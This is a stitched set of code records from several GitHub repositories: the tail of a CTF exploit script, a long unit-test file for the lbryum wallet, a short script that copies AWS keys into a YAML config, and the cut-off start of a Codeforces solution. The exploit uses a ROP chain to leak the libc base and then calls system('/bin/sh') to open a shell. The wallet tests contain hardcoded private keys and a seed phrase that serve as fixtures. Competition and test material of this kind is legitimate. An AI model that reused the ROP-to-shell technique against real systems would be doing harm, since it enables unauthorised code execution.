start()\n\nio.recvuntil(b'>')\n\npayload = fit({\n 80: rop.chain(),\n 127: b'\\x00',\n 152: p64(0x0401266)\n})\n\nio.send(xorpayload(payload[:-1]))\nio.recvuntil(b':')\nio.recvline()\nleak = u64(io.recvline().strip().ljust(8, b'\\x00'))\nlibc.address = leak - libc.sym.fgets\nprint(f'libc base @ {hex(libc.address)}')\n\nrop2 = ROP(libc)\nrop2.system(next(libc.search(b'/bin/sh\\x00')))\nio.recvuntil(b'>')\n\npayload = fit({\n 80: rop2.chain(), \n 152: p64(0x0401266)\n})\n\nio.sendline(xorpayload(payload))\nio.interactive()\n\n","repo_name":"ept-team/equinor-ctf-2022","sub_path":"writeups/Pwn/xored/EPT/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"25256967924","text":"import unittest\nfrom mock import patch\nfrom StringIO import StringIO\n\nfrom lbryschema.claim import ClaimDict\nfrom lbryschema.signer import SECP256k1\n\nfrom lbryum import main\nfrom lbryum import __version__\nfrom lbryum.errors import NotEnoughFunds\nfrom lbryum.constants import LBRYCRD_MIN_FEE_PER_NAMECLAIM_CHAR, COIN\nfrom lbryum.transaction import Transaction\nfrom test_data import SAMPLE_CLAIMS_FOR_NAME_RESULT, SAMPLE_CLAIMTRIE_GETVALUE_RESULT,\\\n SAMPLE_CLAIMTRIE_GETVALUEFORURI_RESULT, SECP256K1_PRIVATE_KEY\n\nfrom testing import *\n\n\nclass TestMain(unittest.TestCase):\n\n @patch('sys.stdout', new_callable=StringIO)\n def test_main(self, stdout):\n with self.assertRaises(SystemExit):\n main.main([\"version\", \"-D\", \".\"])\n self.assertEqual(stdout.getvalue().strip(), '\"'+__version__+'\"')\n\n\nclass TestMiscCommands(unittest.TestCase):\n\n seed_text = (\n \"travel nowhere air position hill peace suffer parent beautiful\"\n \"rise blood power home crumble teach\"\n )\n password = \"secret\"\n\n def 
test_commands(self):\n cmds = MocCommands()\n self.assertEqual(\n 96, len(cmds.commands().split())\n )\n\n def test_get_parser(self):\n parser = commands.get_parser()\n self.assertIn('lbryum help', parser.format_help())\n\n def test_locked(self):\n cmds = MocCommands()\n self.assertEqual(False, cmds.locked)\n cmds.wallet.use_encryption = True\n self.assertEqual(True, cmds.locked)\n cmds._password = 'foo'\n self.assertEqual(False, cmds.locked)\n\n def test_lock_unlock(self):\n cmds = MocCommands()\n self.assertEqual(False, cmds.locked)\n\n # unlocking an already unlocked wallet\n cmds.wallet.use_encryption = False\n cmds.unlock_wallet(self.password)\n self.assertEqual(False, cmds.locked)\n cmds._password = self.password\n cmds.unlock_wallet(self.password)\n self.assertEqual(False, cmds.locked)\n\n # lock wallet\n cmds.lock_wallet()\n cmds.wallet.use_encryption = True\n self.assertEqual(True, cmds.locked)\n\n # unlock a genuinely locked wallet\n cmds.wallet.add_seed(self.seed_text, self.password)\n cmds.wallet.create_master_keys(self.password)\n cmds.unlock_wallet(self.password)\n self.assertEqual(False, cmds.locked)\n\n def test_decrypt_wallet(self):\n cmds = MocCommands()\n cmds.wallet.add_seed(self.seed_text, self.password)\n cmds.wallet.create_master_keys(self.password)\n cmds._password = self.password\n\n cmds.wallet.use_encryption = False\n cmds.decrypt_wallet()\n self.assertEqual(0, cmds.wallet.storage.write_called)\n\n cmds.wallet.use_encryption = True\n cmds.decrypt_wallet()\n self.assertEqual(1, cmds.wallet.storage.write_called)\n\n def test_update_password(self):\n cmds = MocCommands()\n\n cmds.update_password(None)\n self.assertEqual(cmds._password, None)\n\n cmds.wallet.use_encryption = True\n cmds.wallet.add_seed(self.seed_text, self.password)\n cmds.wallet.create_master_keys(self.password)\n cmds._password = self.password\n cmds.update_password('foo')\n self.assertEqual(cmds._password, 'foo')\n self.assertTrue(cmds._keyring.set_password_called)\n\n cmds._keyring = None\n with self.assertRaises(ValueError):\n cmds.update_password('foo')\n\n self.assertEqual({'password': True}, cmds.password())\n\n\nclass TestImportExportCertificateInfoCommand(unittest.TestCase):\n\n def _make_claim_tx_key(self, cmds):\n claim = ClaimDict.generate_certificate(SECP256K1_PRIVATE_KEY, curve=SECP256k1)\n cmds.wallet.add_address_transaction(4003002001000)\n tx = cmds.wallet.add_claim_transaction('lbry://@test', 1000, claim.serialized)\n\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsbyids': lambda _: {\n tx.get_claim_id(0): cmds.wallet.get_name_claims()[0]\n }\n })\n key = cmds._serialize_certificate_key(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n return claim, tx, key\n\n def test_importcertificateinfo_no_args(self):\n self.assertEqual({}, MocCommands().importcertificateinfo())\n\n def test_importcertificateinfo(self):\n cmds = MocCommands()\n claim, tx, key = self._make_claim_tx_key(cmds)\n self.assertEqual(cmds.importcertificateinfo(key), {\n '84cdc6092acaaffe7f704766a3b3c83e369cb65f': {'success': True}\n })\n\n def test_importcertificateinfo_already_exists(self):\n cmds = MocCommands()\n claim, tx, key = self._make_claim_tx_key(cmds)\n cmds.wallet.save_certificate(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n self.assertEqual(cmds.importcertificateinfo(key), {\n '84cdc6092acaaffe7f704766a3b3c83e369cb65f': {\n 'error': 'refusing to overwrite certificate key already in the wallet',\n 'success': False\n }\n })\n\n def test_exportcertificateinfo(self):\n cmds = MocCommands()\n claim, 
tx, key = self._make_claim_tx_key(cmds)\n cmds.wallet.save_certificate(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n self.assertEqual(\n cmds.exportcertificateinfo(tx.get_claim_id(0)),\n '84cdc6092acaaffe7f704766a3b3c83e369cb65f2d2d2d2d2d424547494e204543'\n '2050524956415445204b45592d2d2d2d2d0a4d485143415145454950626a614566'\n '434343793548487647486b457733582f64544a586c72346a63454a4856314f6d63'\n '4244506d6f416347425375424241414b0a6f555144516741456c4c50726b564961'\n '7076744b727630446b67516239764158744351444249752b69486c735143356478'\n '315a6e4f575a7770594b51754d34690a4c4e6275546c667843485759776f76774c'\n '6a596e616f3869776770306f673d3d0a2d2d2d2d2d454e442045432050524956415'\n '445204b45592d2d2d2d2d0a'\n )\n\n\nclass TestGetBalanceCommand(unittest.TestCase):\n\n def test_getbalance_no_transactions(self):\n cmds = MocCommands()\n self.assertEqual({'confirmed': '0'}, cmds.getbalance())\n\n def test_getbalance(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(1000123000)\n cmds.wallet.add_claim_transaction('test', 5000123000)\n self.assertEqual({'confirmed': '60.00246'}, cmds.getbalance())\n\n def test_getbalance_exclude_claimtrie(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(1000123000)\n cmds.wallet.add_claim_transaction('test', 5000123000)\n self.assertEqual({'confirmed': '10.00123'}, cmds.getbalance(exclude_claimtrietx=True))\n\n\nclass TestGetMaxSpendableAmountForClaim(unittest.TestCase):\n\n def test_get_max_spendable_amount_for_claim(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(800000000)\n cmds.wallet.add_claim_transaction('test0', 100000000)\n cmds.wallet.add_claim_transaction('test1', 200000000)\n amount = cmds.get_max_spendable_amount_for_claim('test0')\n self.assertEqual(9.0, amount)\n amount = cmds.get_max_spendable_amount_for_claim(\"test1\")\n self.assertEqual(10.0, amount)\n # when the claim doesn't exist it should just list the confirmed balance\n amount = cmds.get_max_spendable_amount_for_claim(\"test2\")\n self.assertEqual(8.0, amount)\n\n def test_get_max_spendable_amount_for_claim_multiple_claims(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(800000000)\n cmds.wallet.add_claim_transaction('test0', 100000000)\n cmds.wallet.add_claim_transaction('test0', 200000000)\n result = cmds.get_max_spendable_amount_for_claim('test0')\n self.assertEqual(False, result['success'])\n\n\nclass TestPassthroughNetworkCommands(unittest.TestCase):\n\n def test_getblock(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.block.get_block': lambda arg: arg\n })\n self.assertEqual(['the hash'], cmds.getblock('the hash'))\n\n\nclass TestGetTransactionCommand(unittest.TestCase):\n\n def test_gettransaction_local(self):\n cmds = MocCommands()\n tx = cmds.wallet.add_address_transaction(1)\n self.assertEqual(\n {'inputs', 'lockTime', 'outputs', 'version'},\n set(cmds.gettransaction(tx.hash()))\n )\n\n def test_gettransaction_network(self):\n tx = transaction.Transaction.from_io([], [])\n tx.raw = tx.serialize()\n tx_hash = tx.hash()\n cmds = MocCommands()\n cmds.wallet = None\n cmds.network = MocNetwork({\n 'blockchain.transaction.get': lambda _: tx.raw\n })\n self.assertEqual(\n {'inputs': [], 'lockTime': 0, 'outputs': [], 'version': 1},\n cmds.gettransaction(tx_hash)\n )\n\n\nclass TestGetNameClaimsCommand(unittest.TestCase):\n\n def test_getnameclaims_no_claims(self):\n cmds = MocCommands()\n self.assertEqual([], cmds.getnameclaims())\n\n def test_getnameclaims_with_result(self):\n cmds = 
MocCommands()\n cmds.wallet.add_claim_transaction('test1', 1000123000)\n cmds.wallet.add_claim_transaction('test2', 5000123000)\n self.assertEqual(\n ['test1', 'test2'],\n [c['name'] for c in cmds.getnameclaims()]\n )\n\n\nclass TestGetClaimsForNameCommand(unittest.TestCase):\n\n def test_getclaimsforname_no_claims(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsforname': lambda _: {'claims': []}\n })\n self.assertEqual({'claims': []}, cmds.getclaimsforname('test'))\n\n def test_getclaimsforname(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsforname': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT,\n 'blockchain.claimtrie.getclaimbyid': lambda _: None\n })\n self.assertEqual(9, len(cmds.getclaimsforname('test')['claims']))\n\n\nclass TestGetClaimByIdCommand(unittest.TestCase):\n\n def test_getclaimbyid_no_claims(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimbyid': lambda _: {}\n })\n self.assertEqual({}, cmds.getclaimbyid('test'))\n\n def test_getclaimbyid(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimbyid': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT\n })\n self.assertEqual(9, len(cmds.getclaimbyid('test')['claims']))\n\n\nclass TestGetClaimByOutpointCommand(unittest.TestCase):\n\n def test_getclaimbyoutpoint_no_claims(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsintx': lambda _: []\n })\n self.assertEqual(\n {'error': 'claim not found', 'outpoint': 'test:1', 'success': False},\n cmds.getclaimbyoutpoint('test', 1)\n )\n\n def test_getclaimbyoutpoint(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsintx': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT['claims']\n })\n self.assertEqual(16, len(cmds.getclaimbyoutpoint('test', 1)))\n\n\nclass TestGetClaimsFromTxCommand(unittest.TestCase):\n\n def test_getclaimsfromtx_no_claims(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsintx': lambda _: []\n })\n self.assertEqual([], cmds.getclaimsfromtx('test'))\n\n def test_getclaimsfromtx(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsintx': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT['claims']\n })\n self.assertEqual(SAMPLE_CLAIMS_FOR_NAME_RESULT['claims'], cmds.getclaimsfromtx('test'))\n\n\nclass TestGetCertificateClaimsCommand(unittest.TestCase):\n\n def test_getcertificateclaims_empty(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(4003002001000)\n cmds.wallet.add_claim_transaction('lbry://@test', 1000)\n self.assertEqual([], cmds.getcertificateclaims())\n\n def test_getcertificateclaims(self):\n cmds = MocCommands()\n claim = ClaimDict.generate_certificate(SECP256K1_PRIVATE_KEY, curve=SECP256k1)\n cmds.wallet.add_address_transaction(4003002001000)\n tx = cmds.wallet.add_claim_transaction('lbry://@test', 1000, claim.serialized)\n cmds.wallet.save_certificate(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n cmds.wallet.set_default_certificate(tx.get_claim_id(0))\n self.assertEqual(1, len(cmds.getcertificateclaims()))\n self.assertIn('certificate', cmds.getcertificateclaims()[0]['value'])\n\n\nclass TestGetCertificatesForSigningCommand(unittest.TestCase):\n\n def test_getcertificatesforsigning_empty(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(4003002001000)\n cmds.wallet.add_claim_transaction('lbry://@test', 1000)\n 
self.assertEqual([], cmds.getcertificatesforsigning())\n\n def test_getcertificatesforsigning(self):\n cmds = MocCommands()\n claim = ClaimDict.generate_certificate(SECP256K1_PRIVATE_KEY, curve=SECP256k1)\n cmds.wallet.add_address_transaction(4003002001000)\n tx = cmds.wallet.add_claim_transaction('lbry://@test', 1000, claim.serialized)\n cmds.wallet.save_certificate(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n cmds.wallet.set_default_certificate(tx.get_claim_id(0))\n self.assertEqual(1, len(cmds.getcertificatesforsigning()))\n self.assertIn('certificate', cmds.getcertificateclaims()[0]['value'])\n\n\nclass TestGetValueForNameCommand(unittest.TestCase):\n\n def setUp(self):\n self.cmds = MocCommands()\n self.cmds.network.default_server = 'lbryum8.lbry.io:50001:t'\n self.cmds.network.blockchain.local_height = 316209\n self.cmds.network.heights = {\n self.cmds.network.default_server: self.cmds.network.blockchain.local_height\n }\n self.cmds.network.blockchain.respond_with_header = {\n 'nonce': 3669616010,\n 'prev_block_hash': '2861f2474292fdad2e3e57bb07d59afd42eb3b17c96fa387ba31af09c6cd5220',\n 'timestamp': 1517698627,\n 'merkle_root': 'cee32cc073fb0f62ce78ef14d0cd5de852d3e9e6af1c4f748bf402a34dfb05f2',\n 'claim_trie_root': '7e0e07df79b4eb7a3d1235ef03fb6a0bd2a581de8a33f570a9bffedb3afc3923',\n 'version': 536870912,\n 'bits': 436557565\n }\n\n def test_getvalueforname_no_value(self):\n self.cmds.network.responses = {\n 'blockchain.claimtrie.getvalue': lambda _: {}\n }\n self.assertEqual({'error': 'proof not in result'}, self.cmds.getvalueforname('five'))\n\n def test_getvalueforname(self):\n self.cmds.network.responses = {\n 'blockchain.claimtrie.getvalue': lambda _: SAMPLE_CLAIMTRIE_GETVALUE_RESULT\n }\n self.assertEqual(\n {'address', 'amount', 'claim_id', 'claim_sequence', 'decoded_claim', 'depth',\n 'effective_amount', 'has_signature', 'height', 'name', 'nout',\n 'permanent_url', 'supports', 'txid', 'value'},\n set(self.cmds.getvalueforname('five'))\n )\n\n\nclass TestGetValueForUriCommand(unittest.TestCase):\n\n def setUp(self):\n self.cmds = MocCommands()\n self.cmds.network.blockchain.local_height = 317927\n self.cmds.network.heights = {\n self.cmds.network.default_server: self.cmds.network.blockchain.local_height\n }\n self.cmds.network.blockchain.respond_with_header = {\n 'nonce': 3350083195,\n 'prev_block_hash': 'b9317a536af52914a000ebfeaf2b5353bac4c615d6de9bdc19459df9c91ffc5b',\n 'timestamp': 1517971678,\n 'merkle_root': '01a65e2fed60beb1c2375c521b2db31abfcb25685436fd35fab8ac1afd97e9b9',\n 'claim_trie_root': '8cf7a34f08a731334cc8473e18115ce81e59fec753f1bc6c73d0f8b493705ba5',\n 'version': 536870912,\n 'bits': 436486851\n }\n\n def test_getvalueforuri_no_value(self):\n self.cmds.network.responses = {\n 'blockchain.claimtrie.getvaluesforuris': lambda _: {}\n }\n self.assertEqual({}, self.cmds.getvalueforuri('lbry://five'))\n self.assertEqual({}, self.cmds.getvaluesforuris('lbry://five'))\n\n def test_getvalueforuri(self):\n self.cmds.network.responses = {\n 'blockchain.claimtrie.getvaluesforuris': lambda _: SAMPLE_CLAIMTRIE_GETVALUEFORURI_RESULT\n }\n self.assertEqual({'claim'}, set(self.cmds.getvalueforuri('lbry://five')))\n self.assertEqual({u'lbry://five'}, set(self.cmds.getvaluesforuris('lbry://five')))\n\n\nclass TestListAddressesCommand(unittest.TestCase):\n\n def test_listaddresses_no_value(self):\n cmds = MocCommands()\n out = cmds.listaddresses()\n self.assertEqual([], out)\n\n def test_listaddresses(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n out = 
cmds.listaddresses()\n self.assertEqual(['bScaWvgzAzFXzAcVgDDARfo9RFhdrm4pVc'], out)\n\n\nclass TestListUnspentCommand(unittest.TestCase):\n\n def test_listunspent_no_value(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n self.assertEqual([], cmds.listunspent())\n\n def test_listunspent(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n cmds.wallet.add_address_transaction(110000000)\n self.assertEqual([{\n 'address': 'bMF18XkZ6K9JT172dA4DxxQK92Q7XrQxCL',\n 'coinbase': False,\n 'height': 2,\n 'is_claim': False,\n 'is_support': False,\n 'is_update': False,\n 'prevout_hash': 'df303881e9014cce89c7acf55b124372e22979284baa99bb9fa178a9d35c97cb',\n 'prevout_n': 0,\n 'value': 1.1\n }], cmds.listunspent())\n\n\nclass TestGetPubKeysCommand(unittest.TestCase):\n\n def test_getpubkeys(self):\n cmds = MocCommands()\n address = cmds.wallet.create_new_address()\n self.assertEqual(\n ['02f0eaac8dde84cf80ebdb3b136cb29d8c7954c869c6c8fdf9d72a82323a72a30e'],\n cmds.getpubkeys(address)\n )\n\n\nclass TestIsMineCommand(unittest.TestCase):\n\n def test_ismine_yes(self):\n cmds = MocCommands()\n address = cmds.wallet.create_new_address()\n self.assertEqual(True, cmds.ismine(address))\n\n def test_ismine_no(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n self.assertEqual(False, cmds.ismine('deadbeef'*12))\n\n\nclass TestClaimHistoryCommand(unittest.TestCase):\n\n def test_claimhistory_empty(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n self.assertEqual([], cmds.claimhistory())\n\n def test_claimhistory(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.make_last_tx_verified()\n tx = cmds.wallet.add_claim_transaction('test', 310000000)\n cmds.wallet.make_last_tx_verified()\n cmds.wallet.add_support_transaction(\n 'test', 110000000, tx.get_claim_id(0), \"bRcHraa8bYJZL7vkh5sNmGwPDERFUjGPP9\"\n )\n cmds.wallet.make_last_tx_verified()\n self.assertEqual([5.1, 3.1, 1.1], [h['value'] for h in cmds.claimhistory()])\n\n\nclass TestPayToCommand(unittest.TestCase):\n\n def test_payto_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.create_new_address(for_change=True)\n destination = cmds.wallet.create_new_address()\n out = cmds.payto([(destination, 1)])\n self.assertEqual(True, out['success'])\n\n def test_payto_throws_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.create_new_address(for_change=True)\n destination = cmds.wallet.create_new_address()\n with self.assertRaises(NotEnoughFunds):\n cmds.payto([(destination, 510000)])\n\n\nclass TestClaimCommand(unittest.TestCase):\n\n def test_claim_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(110000000)\n out = cmds.claim('test', 'value', 1, skip_validate_schema=True, raw=True)\n self.assertEqual(True, out['success'])\n\n def test_claim_not_enough_funds(self):\n cmds = MocCommands()\n out = cmds.claim('test', '[payload]', 1, skip_validate_schema=True, raw=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n def test_claim_fee(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(110000000)\n\n name = '0'*50\n out = cmds.claim(name, 'value', 1, skip_validate_schema=True, raw=True)\n self.assertEqual(True, out['success'])\n self.assertEqual(LBRYCRD_MIN_FEE_PER_NAMECLAIM_CHAR*50, float(out['fee'])*COIN)\n\n out = cmds.claim('1', 'value', 1, 
skip_validate_schema=True, raw=True)\n self.assertEqual(True, out['success'])\n self.assertEqual(LBRYCRD_MIN_FEE_PER_NAMECLAIM_CHAR, float(out['fee'])*COIN)\n\nclass TestRenewClaimCommand(unittest.TestCase):\n\n def test_renewclaim_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 100200)\n out = cmds.renewclaim(tx.hash(), 0, skip_validate_schema=True)\n self.assertEqual(True, out['success'])\n\n def test_renewclaim_fee_more_than_original_bid(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 10)\n out = cmds.renewclaim(tx.hash(), 0, skip_validate_schema=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('Fee will exceed amount available in original bid. Increase amount', out['reason'])\n\n\nclass TestRenewClaimBeforeExpirationCommand(unittest.TestCase):\n\n def test_renewclaimbeforeexpiration_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 100200)\n out = cmds.renewclaimsbeforeexpiration(270000, skip_validate_schema=True)\n self.assertEqual(1, len(out.values()))\n self.assertEqual(True, out.values()[0]['success'])\n\n def test_renewclaimbeforeexpiration_nothing_renewed(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 100200)\n out = cmds.renewclaimsbeforeexpiration(260000, skip_validate_schema=True)\n self.assertEqual(0, len(out.values()))\n\n\nclass TestClaimCertificateCommand(unittest.TestCase):\n\n def test_claimcertificate_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(4003002001000)\n out = cmds.claimcertificate('lbry://@test', 1000)\n self.assertEqual(True, out['success'])\n\n def test_claim_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(3002001000)\n out = cmds.claimcertificate('lbry://@test', 1000)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n\nclass TestUpdateCommand(unittest.TestCase):\n\n def test_update_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.update('test', '[payload]', amount=1, tx_fee=1, skip_validate_schema=True, raw=True)\n self.assertEqual(True, out['success'])\n\n def test_update_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(110000000)\n cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.update('test', '[payload]', amount=1, tx_fee=1, skip_validate_schema=True, raw=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n def test_update_not_found(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.update('foo', '[payload]', amount=1, tx_fee=1, skip_validate_schema=True, raw=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('No claim to update', out['reason'])\n\n\nclass TestSendClaimToAddressCommand(unittest.TestCase):\n\n def test_sendclaimtoaddress_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n destination = cmds.wallet.create_new_address()\n out = cmds.sendclaimtoaddress(tx.get_claim_id(0), destination, 1, 
skip_validate_schema=True)\n self.assertEqual(True, out['success'])\n\n def test_sendclaimtoaddress_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(1000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n destination = cmds.wallet.create_new_address()\n out = cmds.sendclaimtoaddress(tx.get_claim_id(0), destination, 1, skip_validate_schema=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n def test_sendclaimtoaddress_not_found(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 1)\n destination = cmds.wallet.create_new_address()\n out = cmds.sendclaimtoaddress('invalid', destination, 1, skip_validate_schema=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('claim not found', out['reason'])\n\n\nclass TestSupportCommand(unittest.TestCase):\n\n def test_support_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.support('test', tx.get_claim_id(0), 1, tx_fee=1)\n self.assertEqual(True, out['success'])\n\n def test_support_invalid_claim_id(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(10000000)\n out = cmds.support('test', 'deadbeef', 1, tx_fee=1)\n self.assertEqual(False, out['success'])\n self.assertEqual('Invalid claim id', out['reason'])\n\n def test_support_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(10000000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.support('test', tx.get_claim_id(0), 1, tx_fee=1)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n\nclass TestSendWithSupportCommand(unittest.TestCase):\n\n def test_sendwithsupport_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimbyid': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT['claims'][0]\n })\n out = cmds.sendwithsupport(tx.get_claim_id(0), 1)\n self.assertEqual(True, out['success'])\n\n\nclass TestAbandonCommand(unittest.TestCase):\n\n def abandon_claim_with_name_value(self, name, satoshis, cmds=None):\n cmds = cmds or MocCommands()\n cmds.wallet.create_new_address(for_change=True)\n tx = cmds.wallet.add_claim_transaction(name, satoshis)\n return cmds.abandon(claim_id=tx.get_claim_id(0))\n\n def test_abandon_success(self):\n out = self.abandon_claim_with_name_value('test', 10000)\n self.assertEqual(True, out['success'])\n\n def test_abandon_fails_for_tiny_claim(self):\n out = self.abandon_claim_with_name_value('test', 1000)\n self.assertEqual(False, out['success'])\n self.assertEqual('transaction fee exceeds amount available', out['reason'])\n\n def test_abandon_fails_for_tiny_claim_and_not_enough_other_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(500)\n out = self.abandon_claim_with_name_value('test', 1000, cmds)\n self.assertEqual(False, out['success'])\n self.assertEqual('transaction fee exceeds amount available', out['reason'])\n\n def test_abandon_success_for_tiny_claim_with_enough_other_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(12000)\n cmds.wallet.add_address_transaction(12000)\n out = self.abandon_claim_with_name_value('test', 1000, cmds)\n self.assertEqual(True, out['success'])\n sent = 
cmds.wallet.sent_transactions[0]\n self.assertEqual(len(sent._inputs), 3)\n self.assertEqual(sent._inputs[0]['value'], 1000)\n self.assertEqual(sent._inputs[1]['value'], 12000)\n self.assertEqual(sent._inputs[2]['value'], 12000)\n self.assertEqual(len(sent._outputs), 1)\n self.assertEqual(sent._outputs[0][2], 600)\n\n\nclass TestSweepCommand(unittest.TestCase):\n\n private_key = \"L52XzL2cMkHxqxBXRyEpnPQZGUs3uKiL3R11XbAdHigRzDozKZeW\"\n\n def test_sweep_no_unspent(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.address.listunspent': lambda _: []\n })\n destination = cmds.wallet.create_new_address()\n result = cmds.sweep(self.private_key, destination)\n self.assertEqual(False, result['success'])\n\n def test_sweep(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(120000)\n cmds.wallet.add_address_transaction(120000)\n unspent = []\n for tx in cmds.wallet.transactions.values():\n for output in tx._outputs:\n unspent.append((tx.hash(), output))\n cmds.network = MocNetwork({\n 'blockchain.address.listunspent': lambda _: [{\n 'tx_hash': tx_hash,\n 'tx_pos': 1,\n 'address': address,\n 'coinbase': False,\n 'height': 2,\n 'is_claim': False,\n 'is_support': False,\n 'is_update': False,\n 'prevout_hash': 'df303881e9014cce89c7acf55b124372e22979284baa99bb9fa178a9d35c97cb',\n 'prevout_n': 0,\n 'value': amount\n } for (tx_hash, (type, address, amount)) in unspent]\n })\n destination = cmds.wallet.create_new_address()\n result = cmds.sweep(self.private_key, destination)\n self.assertEqual(True, result['success'])\n sent = Transaction(result['tx'])\n sent.deserialize()\n self.assertEqual(len(sent._outputs), 1)\n self.assertEqual(sent._outputs[0][2], 230000)\n\n\nclass FormatTests(unittest.TestCase):\n\n def test_format_lbrycrd_keys(self):\n a = {'amount': 100000000}\n out = commands.format_amount_value(a)\n self.assertEqual(1.0, out['amount'])\n","repo_name":"feitianyiren/lbryum","sub_path":"tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":31174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"73485233424","text":"import ConfigParser\nimport os\nimport yaml\nimport boto3\n\ns3 = boto3.client('s3')\n\nbucketname = 'test-athena-parquet'\n\nos.path.expanduser('~')\nconfig = ConfigParser.ConfigParser()\nconfig.read(os.path.expanduser('~/.aws/credentials'))\n\naws_access_key_id = config.get('default', 'aws_access_key_id')\naws_secret_access_key = config.get('default', 'aws_secret_access_key')\n\ndic = {\n 'out': {\n 'type': 'parquet',\n 'path_prefix': 's3a://' + bucketname + '/titanic/',\n 'extra_configurations': {\n 'fs.s3a.access.key': aws_access_key_id,\n 'fs.s3a.secret.key': aws_secret_access_key\n }\n }\n}\n\nwith open('_outs3.yml.liquid', 'w') as f:\n yaml.dump(dic, f, default_flow_style=False)\n","repo_name":"imura81gt/test-athena","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14276786195","text":"# https://codeforces.com/contest/160/problem/A\n\nn 